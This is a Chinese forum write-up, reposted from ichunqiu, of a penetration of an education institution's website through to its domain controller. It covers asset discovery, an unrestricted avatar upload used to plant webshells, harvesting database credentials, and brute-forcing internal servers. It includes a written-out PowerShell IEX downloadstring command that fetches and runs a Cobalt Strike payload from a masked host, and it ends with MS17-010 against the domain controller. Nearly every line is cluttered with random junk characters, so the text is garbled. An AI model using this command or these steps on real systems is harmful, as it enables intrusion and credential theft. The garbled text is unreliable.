- W) A: ~5 t1 e. j5 b; Q
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路9 {0 c( i) j& t% s
5 i5 E5 A2 N% v4 }4 i! j
4 M8 L; r' n) i# C; a$ |
6 \1 J. }4 n+ x6 ]% D4 u( I
4 Y7 G* o; u+ f' u' p
" x1 k( f% _2 `' q5 x 正文4 p! X1 O( X- d( J
, _2 P1 B3 q2 {% e& Q
; ~ N6 V% w% J8 u
% L4 Q" p4 H, t R. _2 E, m, C0 f2 Z
8 S1 Z2 s) H( \. R8 C% C. Q
目标:www.xxxx.com(一家教育机构) 2 _* M5 J5 a( Q' F, T
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能8 R* N0 J, R) \4 i3 J0 u& e
+ b& [0 b0 D) P( c4 }+ H
: { \0 f, K' \0 O$ t7 \+ v 7 a; L1 |8 u* z) S5 K' {
8 |3 O, e$ O3 S9 a" l% O
! b) u9 M3 d/ [) Y
进行了简单的信息搜集
- J. F, }0 |* m% s6 L: S/ p& a
4 H5 B8 M, o! y, H: F' |: b
8 l9 N$ @; J" U. L! K5 F 5 a! F5 S) }% v+ N
1 _+ R8 Y2 ^3 t0 Y
子域名搜集; G5 B( M& w, J3 ]5 H( s+ ^, V
9 P% x) J+ }' V
/ @$ e, G/ u4 ]! z
0 b4 I/ x# f! F/ u
9 U. X6 K3 ~! ?9 J* {" _% O
: B% v# _1 G. o1 c) V fofa找资产 # c, [" `2 e) e
% v5 W1 S% ]7 i
- G( x. O. i5 Q6 Q# `3 Y ! S8 q! t, o& L h$ ?
+ n% ?( I: K7 H: _8 D r2 \
- }# w, G0 L6 Y2 {
1 Y7 n b; Q, _% q" q: ]& ^ `& `/ o- y2 K. ]- E
一共七个资产。去重之后只有两个。 . N, X; x- ?- C
: W% z% H o, `2 B c
0 I4 v& T3 b& @) q # l" @! a- C. j3 t: ?/ h1 J" A9 W
7 j7 N4 k* e8 \1 ~
目录探测+ q i" q9 P B: \2 H/ Q: r# d
1 E5 O; M8 o% O
/ C( Y* A6 k* I4 a2 f/ y0 n
' Q* \5 L% t2 o/ ~; V2 Z * O2 ~" i6 Q( O8 T) y2 x0 J/ ~7 A
9 a4 ~5 b5 `" K
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
* _! l+ \% C% f # f# |/ Y2 P. a
; W4 H' U, i$ m 0 T0 l+ Z. I9 i6 H9 ?/ m2 p& E& H
2 f0 Z- I9 {4 \8 Q' ]* v# E
我又尝试了通过修改返回包来绕过登录界面7 j7 h% V9 L- L* a' H- s+ r
! `* t$ E+ B0 Z/ |
+ k. i! f1 t# l
J. Q9 a6 b( l
/ `/ G8 d k. \6 a& T
# t3 L6 N5 ]! Q 还是不行,尝试注入无果, \6 a8 a3 u& p0 n) k" P
9 S9 F% Q& A/ Y! `( {' E
% T4 ?& F+ p3 n+ N8 ?4 ?5 G
& I; K* j8 F8 z+ J0 N
3 c) m8 K2 \0 t0 g1 f4 _7 O# r6 C" P0 v: I# i
不过我目录探测出了一处Spring信息泄露
* a5 g& R/ F' H: ]2 O , m" e1 a# {: |; ^+ l
2 E M$ U* v, p5 Y5 w% _2 u% l9 O
: j* q) h5 u- e+ N' h- A- X6 x' G: v
( e- a Y. V0 _ \9 y+ z8 q + X5 R# k$ A" H8 w: T
0 Q) y2 P( \: E& A& M! a+ [' L8 d3 @( x
! H, ~, ~1 c5 m& i' T+ S5 u1 K 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录0 E- t- Z6 ?6 G- V$ i/ a
W* t" o" }- {3 y- V% e
6 a# J2 q+ H& Q; ^
& v) z2 t( i7 {
. X6 i8 K8 A8 ?( P* Z/ k
# Z8 o2 k6 q% K2 D 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
, \" ~1 A" [! ]$ u+ ]
1 a" @/ V2 a' U% s) }
& W1 d* U1 I+ p3 _6 G
' `$ i S3 V! n8 A. _; m. S- C # c3 H0 y8 Z' x' G! X
; A) k, ]* q- J0 P. Z- K' D/ m( p
获取有些师傅到这一步就手机抓包电脑测了。( E e1 Q+ N) j6 X3 |) {
- E- ?* Z) j4 u3 P" \) E2 J
+ ^3 U% w5 p2 w9 X- p* K# d Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
# J( ]6 `6 D+ _! \4 r
. z8 S# X- O* y; m0 o* M, B5 K Y7 E a5 F% [
其中在一个公众号发现了小程序,可以进行注册。
! W3 _( Y: r6 S/ j6 U' b ; Z8 f4 e- i& o9 \% z, u+ a
0 X5 V! x4 g. Z7 e 看到了头像上传,尝试上传获取WebShell9 T' I: n# R) Z, [
4 p5 _6 R2 C& \& m( |! C# B) q- Z! Q
8 z& n( ]9 k6 ]: t: C! Z0 F# k % Z9 C. e/ q$ M+ h/ P+ ?5 N, p
2 e9 x& m8 q1 y: f9 Z' I! o% W: y/ V+ f/ r2 m. Y& f7 Z
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 E( G. {9 k* @: Q
$ R# | r- O% o) n! v0 v- x2 I! g! Z! C* Y+ T
$ O! C7 b( L1 X1 a3 B9 p
2 V4 G4 R; I6 @& `. }. z
0 s7 n6 G+ S9 O. n: I2 ~ 然后上了大马0 h# @0 C: ^' q0 A2 @$ K& ]6 h
2 c: S" |/ h8 ]4 L) p
% y4 `% I# F2 N ' X) H9 H8 ^ W% V( j# M5 [1 S$ o0 ?" o. \
2 i+ _7 B& ]2 c: F8 d6 `$ Z" ?6 W' I( y! X% I# B1 k! T' F
8 Q; S' V0 z" B6 D# J: c
. x8 e) W" y$ B. N4 w: y1 q. b) f; t! c. t/ ~ O( N4 }
通过翻找文件发现数据库账号密码
& C* Q9 c' K2 ~( [& u; c 6 s! e% G* t3 r4 r3 V
5 A2 Y+ F) U) G3 e, H1 O" U+ P2 \
1 ^* k% G+ @* O9 E
% ]3 D" S' ]/ N
* g2 t; _9 \6 e, U1 @3 L5 D, l --内网渗透 Y6 i& z% J% w: `
( U% h# @ ]: C4 m2 A3 r
$ N R3 s1 L' F) i$ [, a 直接通过powershell执行 cs上线
* e. ~. h" G# h: X5 H- y4 u / |, |, V5 b5 n# b; {# k
6 F% U7 @! L* P6 R
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
, Y3 _8 f4 n: \7 X# o/ y+ [2 e1 C/ v( E 2 ]; |: I4 Q' v9 i0 o9 |
, T- [8 t6 ]7 E- x& C
- r' f* s2 x: ^& {& H* c5 ` p - ]6 S$ H% e9 l( _* W
* H! A) {+ c: Z. y1 l 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破, w0 Z* I0 W* q
, z( u* f5 E: `6 U% D9 o. Y3 ~
; B' O1 l/ [% {3 L 0 }8 Q$ |3 M( k4 g( F
6 t% a( |, f, E2 @9 D, W8 C0 V
1 c& K3 y* P* G% @2 |1 G9 c
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
! W1 ~3 K! ~! F) i
3 i, e, @. L8 s# c% l& W s- K8 o7 Q' _6 Q S. u
' g/ x6 U& X2 x/ @% A
, Y L( w' W% [' O
3 H( w8 R6 a, h" R, u; |
0 c, |# H7 c" L( g5 z3 A 7 Y2 q4 F! T w; s4 p" M- a6 K
8 m+ G& h1 a k1 |7 N 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
J [( N5 t" e: T0 G) X( ` 7 R& E) o/ g( U/ e& U& v5 F
4 E: T6 V" _+ S+ y, Z
1 n6 [1 H2 U& i, y' i4 Q
0 E: f7 ]- h" o# Q U
3 ]% o' v( L4 @$ W R) L C
+ X, z# i& K. p1 k( C. F0 K5 U9 w; h4 k
0 J/ k- @0 |) o0 ^4 [6 k
! H9 v/ J J- j% j. V, C1 Y+ F
$ c* v' @* F' O7 ?" P% F. Q( c0 j( s& u3 x, r; s/ m. k
' {7 l+ W3 ]( o- X5 ?! e
( X1 @. K6 b0 s4 E6 o* y( p
3 p% R& Q: M1 u3 w3 k : a h) S: c4 { i2 Z7 ~
4 H, Q' ], @7 r5 }: w$ R 小结
! F. g. Z- c$ [1 o9 t" T3 @! G+ H
5 K; C" [9 x, s: c- w8 q2 k6 q- _( c6 V$ a3 H6 @
: {4 H+ m! K* z$ [9 i/ N
0 n. h9 u- x3 V, _' `5 O3 L
+ k) a% M: Y9 F( m) \( K
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
$ X, _% p5 M2 z' w7 M* }% ^. z+ w ! r* L8 Z. A' X$ p
0 j% p6 N% q6 M1 b& L) X
+ i) @8 x) C" _- H5 N + c5 K+ {7 } c0 a3 ~# ]) |
3 D8 G, h0 ^7 a. j, ~7 X4 Z: x' _
-
9 i' L& Q+ W1 Y2 r8 K; S
3 V$ {1 b" y3 l& r
, K% j0 m# @/ t- p" Y - / \0 B, E# p+ C
9 l0 A' o L d. ^- B
* _6 O+ u" c$ A) o
: f) V4 a- i$ N0 f" q
1 ]$ g+ [) }! |2 J 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html4 Q( c& j9 U; n( A
0 x' a5 z+ K+ j/ j6 K
# e# ?. Y' e, p$ [; e# ]5 q . X8 m/ q$ W2 B: L
|